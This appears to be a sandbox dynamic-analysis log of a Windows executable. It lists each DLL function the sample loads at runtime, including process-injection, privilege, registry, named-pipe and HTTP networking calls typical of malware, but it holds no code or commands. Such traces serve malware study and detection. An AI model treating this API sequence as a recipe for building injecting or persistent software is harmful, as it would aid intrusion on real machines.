DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/CreateEventA
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: kernel32.dll/GetTempFileNameA
DynamicLoader: kernel32.dll/CreateDirectoryA
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/FreeLibrary
DynamicLoader: kernel32.dll/lstrcpynA
DynamicLoader: kernel32.dll/GetFileTime
DynamicLoader: kernel32.dll/FindNextFileA
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/CompareFileTime
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/TerminateThread
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/VirtualProtectEx
DynamicLoader: kernel32.dll/SuspendThread
DynamicLoader: kernel32.dll/ResumeThread
DynamicLoader: kernel32.dll/GetLongPathNameW
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsA
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/SetEndOfFile
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/FlushFileBuffers
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: USER32.dll/DefWindowProcW
DynamicLoader: USER32.dll/SendMessageW
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/CreateWindowExW
DynamicLoader: USER32.dll/SetWindowLongW
DynamicLoader: USER32.dll/SetClassLongW
DynamicLoader: USER32.dll/SystemParametersInfoW
DynamicLoader: USER32.dll/GetAncestor
DynamicLoader: USER32.dll/GetWindowLongW
DynamicLoader: USER32.dll/RegisterClassExW
DynamicLoader: USER32.dll/GetForegroundWindow
DynamicLoader: USER32.dll/TranslateMessage
DynamicLoader: USER32.dll/GetMessageW
DynamicLoader: USER32.dll/keybd_event
DynamicLoader: USER32.dll/DestroyWindow
DynamicLoader: USER32.dll/wsprintfW
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: USER32.dll/DispatchMessageW
DynamicLoader: USER32.dll/GetCursorInfo
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/RegDeleteValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExA
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetSidSubAuthorityCount
DynamicLoader: ADVAPI32.dll/GetSidSubAuthority
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyA
DynamicLoader: ADVAPI32.dll/RegCreateKeyA
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegSetValueExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: SHELL32.dll/
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: SHELL32.dll/ShellExecuteExW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: USER32.dll/FindWindowA
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: kernel32.dll/Wow64EnableWow64FsRedirection
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64ReadVirtualMemory64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ntdll.dll/ZwQueryInformationToken
DynamicLoader: ntdll.dll/ZwOpenProcess
DynamicLoader: ntdll.dll/ZwClose
DynamicLoader: ntdll.dll/ZwOpenProcessToken
DynamicLoader: ntdll.dll/strcpy
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/NtResumeProcess
DynamicLoader: ntdll.dll/RtlNtStatusToDosError
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtSuspendProcess
DynamicLoader: ntdll.dll/memcpy
DynamicLoader: ntdll.dll/NtMapViewOfSection
DynamicLoader: ntdll.dll/_snprintf
DynamicLoader: ntdll.dll/_wcsupr
DynamicLoader: ntdll.dll/_strupr
DynamicLoader: ntdll.dll/memmove
DynamicLoader: ntdll.dll/wcscpy
DynamicLoader: ntdll.dll/memset
DynamicLoader: ntdll.dll/ZwQueryKey
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/RtlUpcaseUnicodeString
DynamicLoader: ntdll.dll/wcstombs
DynamicLoader: ntdll.dll/RtlImageNtHeader
DynamicLoader: ntdll.dll/RtlAdjustPrivilege
DynamicLoader: ntdll.dll/mbstowcs
DynamicLoader: ntdll.dll/NtUnmapViewOfSection
DynamicLoader: ntdll.dll/NtCreateSection
DynamicLoader: ntdll.dll/sprintf
DynamicLoader: ntdll.dll/wcscat
DynamicLoader: ntdll.dll/__C_specific_handler
DynamicLoader: ntdll.dll/__chkstk
DynamicLoader: kernel32.dll/lstrcpynA
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/TerminateThread
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: kernel32.dll/GetComputerNameW
DynamicLoader: kernel32.dll/VirtualProtectEx
DynamicLoader: kernel32.dll/FileTimeToLocalFileTime
DynamicLoader: kernel32.dll/QueueUserWorkItem
DynamicLoader: kernel32.dll/SystemTimeToFileTime
DynamicLoader: kernel32.dll/GetFileTime
DynamicLoader: kernel32.dll/FindNextFileA
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/CompareFileTime
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsA
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/GetLocalTime
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/CreateDirectoryA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/RemoveDirectoryA
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/DeleteFileA
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/HeapReAlloc
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/HeapDestroy
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/SetWaitableTimer
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/GetCurrentThread
DynamicLoader: kernel32.dll/GetSystemTimeAsFileTime
DynamicLoader: kernel32.dll/GetWindowsDirectoryA
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateEventA
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcmpiW
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/lstrcatW
DynamicLoader: kernel32.dll/GetCurrentThreadId
DynamicLoader: kernel32.dll/DuplicateHandle
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: kernel32.dll/SuspendThread
DynamicLoader: kernel32.dll/ResumeThread
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/SwitchToThread
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/MapViewOfFile
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/LeaveCriticalSection
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/EnterCriticalSection
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: kernel32.dll/OpenWaitableTimerA
DynamicLoader: kernel32.dll/OpenMutexA
DynamicLoader: kernel32.dll/WaitForMultipleObjects
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/CreateWaitableTimerA
DynamicLoader: kernel32.dll/InitializeCriticalSection
DynamicLoader: kernel32.dll/UnregisterWait
DynamicLoader: kernel32.dll/TlsGetValue
DynamicLoader: kernel32.dll/LoadLibraryExW
DynamicLoader: kernel32.dll/TlsSetValue
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/RegisterWaitForSingleObject
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/TlsAlloc
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/WideCharToMultiByte
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/CreateFileMappingA
DynamicLoader: kernel32.dll/OpenFileMappingA
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/Thread32First
DynamicLoader: kernel32.dll/Thread32Next
DynamicLoader: kernel32.dll/QueueUserAPC
DynamicLoader: kernel32.dll/OpenThread
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/CallNamedPipeA
DynamicLoader: kernel32.dll/WaitNamedPipeA
DynamicLoader: kernel32.dll/ConnectNamedPipe
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetOverlappedResult
DynamicLoader: kernel32.dll/DisconnectNamedPipe
DynamicLoader: kernel32.dll/FlushFileBuffers
DynamicLoader: kernel32.dll/CreateNamedPipeA
DynamicLoader: kernel32.dll/CancelIo
DynamicLoader: kernel32.dll/GetSystemTime
DynamicLoader: kernel32.dll/RemoveVectoredExceptionHandler
DynamicLoader: kernel32.dll/SleepEx
DynamicLoader: kernel32.dll/AddVectoredExceptionHandler
DynamicLoader: kernel32.dll/OpenEventA
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/FreeLibrary
DynamicLoader: kernel32.dll/RaiseException
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/FileTimeToSystemTime
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/DeleteCriticalSection
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/RemoveDirectoryW
DynamicLoader: kernel32.dll/GetTempFileNameA
DynamicLoader: kernel32.dll/SetEndOfFile
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/SetFilePointerEx
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorA
DynamicLoader: SHLWAPI.dll/StrRChrA
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: ADVAPI32.dll/GetUserNameA
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: ADVAPI32.dll/RegOpenKeyA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: SHLWAPI.dll/StrToIntExA
DynamicLoader: SHLWAPI.dll/StrChrA
DynamicLoader: SHLWAPI.dll/StrTrimA
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpQueryOption
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: WS2_32.dll/WSASocketW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/FreeAddrInfoW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSARecv
DynamicLoader: WS2_32.dll/WSASend
DynamicLoader: WINHTTP.dll/WinHttpReceiveResponse
DynamicLoader: schannel.DLL/SpUserModeInitialize
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: secur32.dll/FreeContextBuffer
DynamicLoader: ncrypt.dll/SslOpenProvider
DynamicLoader: ncrypt.dll/GetSChannelInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/SslIncrementProviderReferenceCount
DynamicLoader: ncrypt.dll/SslImportKey
DynamicLoader: bcryptprimitives.dll/GetCipherInterface
DynamicLoader: ncrypt.dll/SslLookupCipherSuiteInfo
DynamicLoader: USER32.dll/LoadStringW
DynamicLoader: ncrypt.dll/BCryptOpenAlgorithmProvider
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptGetProperty
DynamicLoader: ncrypt.dll/BCryptCreateHash
DynamicLoader: ncrypt.dll/BCryptHashData
DynamicLoader: ncrypt.dll/BCryptFinishHash
DynamicLoader: ncrypt.dll/BCryptDestroyHash
DynamicLoader: CRYPT32.dll/CertGetCertificateChain
DynamicLoader: USERENV.dll/GetUserProfileDirectoryW
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: sechost.dll/ConvertStringSidToSidW
DynamicLoader: USERENV.dll/RegisterGPNotification
DynamicLoader: GPAPI.dll/RegisterGPNotificationInternal
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: sechost.dll/QueryServiceConfigW
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: SensApi.dll/IsNetworkAlive
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: setupapi.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: Cabinet.dll/
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptSetHashParam
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptVerifySignatureA
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/QueryServiceConfigA
DynamicLoader: sechost.dll/QueryServiceStatus
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeA
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingA
DynamicLoader: RPCRT4.dll/RpcEpResolveBinding
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: RPCRT4.dll/RpcStringFreeA
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: setupapi.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: Cabinet.dll/
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: WINHTTP.dll/WinHttpSetTimeouts
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpCrackUrl
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpGetDefaultProxyConfiguration
DynamicLoader: WINHTTP.dll/WinHttpGetIEProxyConfigForCurrentUser
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: cryptbase.dll/SystemFunction036
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: NSI.dll/NsiAllocateAndGetTable
DynamicLoader: CFGMGR32.dll/CM_Open_Class_Key_ExW
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: NSI.dll/NsiFreeTable
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: WINHTTP.dll/WinHttpGetProxyForUrl
DynamicLoader: WINHTTP.dll/WinHttpTimeFromSystemTime
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WINHTTP.dll/WinHttpReceiveResponse
DynamicLoader: WINHTTP.dll/WinHttpQueryHeaders
DynamicLoader: SHLWAPI.dll/StrStrIW
DynamicLoader: WINHTTP.dll/WinHttpQueryDataAvailable
DynamicLoader: WINHTTP.dll/WinHttpReadData
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: cryptnet.dll/I_CryptNetSetUrlCacheFlushInfo
DynamicLoader: setupapi.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: Cabinet.dll/
DynamicLoader: bcryptprimitives.dll/GetAsymmetricEncryptionInterface
DynamicLoader: ncrypt.dll/BCryptImportKeyPair
DynamicLoader: ncrypt.dll/BCryptVerifySignature
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptDestroyKey
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: WINHTTP.dll/WinHttpSetStatusCallback
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: setupapi.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: Cabinet.dll/
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: setupapi.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: Cabinet.dll/
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: CRYPT32.dll/CertVerifyCertificateChainPolicy
DynamicLoader: CRYPT32.dll/CertFreeCertificateChain
DynamicLoader: CRYPT32.dll/CertDuplicateCertificateContext
DynamicLoader: ncrypt.dll/SslEncryptPacket
DynamicLoader: ncrypt.dll/SslDecryptPacket
DynamicLoader: WINHTTP.dll/WinHttpQueryHeaders
DynamicLoader: WINHTTP.dll/WinHttpReadData
DynamicLoader: ole32.dll/CreateStreamOnHGlobal
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: ADVAPI32.dll/RegCreateKeyA
DynamicLoader: ADVAPI32.dll/RegSetValueExA
DynamicLoader: USER32.dll/GetShellWindow
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: ntdll.dll/RtlExitUserThread
DynamicLoader: kernel32.dll/CreateRemoteThread
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: ncrypt.dll/SslFreeObject
DynamicLoader: ntdll.dll/ZwQueryInformationToken
DynamicLoader: ntdll.dll/ZwOpenProcess
DynamicLoader: ntdll.dll/ZwClose
DynamicLoader: ntdll.dll/ZwOpenProcessToken
DynamicLoader: ntdll.dll/strcpy
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/NtResumeProcess
DynamicLoader: ntdll.dll/RtlNtStatusToDosError
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtSuspendProcess
DynamicLoader: ntdll.dll/memcpy
DynamicLoader: ntdll.dll/NtMapViewOfSection
DynamicLoader: ntdll.dll/_snprintf
DynamicLoader: ntdll.dll/_wcsupr
DynamicLoader: ntdll.dll/_strupr
DynamicLoader: ntdll.dll/memmove
DynamicLoader: ntdll.dll/wcscpy
DynamicLoader: ntdll.dll/memset
DynamicLoader: ntdll.dll/ZwQueryKey
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/RtlUpcaseUnicodeString
DynamicLoader: ntdll.dll/wcstombs
DynamicLoader: ntdll.dll/RtlImageNtHeader
DynamicLoader: ntdll.dll/RtlAdjustPrivilege
DynamicLoader: ntdll.dll/mbstowcs
DynamicLoader: ntdll.dll/NtUnmapViewOfSection
DynamicLoader: ntdll.dll/NtCreateSection
DynamicLoader: ntdll.dll/sprintf
DynamicLoader: ntdll.dll/wcscat
DynamicLoader: ntdll.dll/__C_specific_handler
DynamicLoader: ntdll.dll/__chkstk
DynamicLoader: kernel32.dll/lstrcpynA
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/TerminateThread
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: kernel32.dll/GetComputerNameW
DynamicLoader: kernel32.dll/VirtualProtectEx
DynamicLoader: kernel32.dll/FileTimeToLocalFileTime
DynamicLoader: kernel32.dll/QueueUserWorkItem
DynamicLoader: kernel32.dll/SystemTimeToFileTime
DynamicLoader: kernel32.dll/GetFileTime
DynamicLoader: kernel32.dll/FindNextFileA
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/CompareFileTime
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsA
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/GetLocalTime
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/HeapAlloc
